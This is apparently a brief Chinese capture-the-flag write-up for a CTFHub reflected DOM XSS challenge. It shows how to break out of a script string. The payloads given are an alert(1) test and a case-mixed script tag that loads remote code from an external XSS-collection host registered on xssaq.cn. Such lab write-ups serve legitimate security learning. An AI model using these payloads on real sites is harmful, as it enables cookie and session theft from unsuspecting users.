根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
abigale031 小时前
webpack+vite前端构建工具 -11实战中的配置技巧专注API从业者1 小时前
构建淘宝评论监控系统:API 接口开发与实时数据采集教程Joker`s smile2 小时前
Chrome安装老版本、不同版本,自制便携版本用于前端调试weixin_416639972 小时前
爬虫工程师Chrome开发者工具简单介绍我是如子啊2 小时前
【解决“此扩展可能损坏”】Edge浏览器(chrome系列通杀))扩展损坏?一招保留数据快速修复灵性花火2 小时前
Qt的前端和后端过于耦合(0/7)孤水寒月6 小时前
基于HTML的悬窗可拖动记事本祝余呀6 小时前
html初学者第一天安全系统学习7 小时前
【网络安全】Mysql注入中锁机制耶啵奶膘8 小时前
uniapp+firstUI——上传视频组件fui-upload-video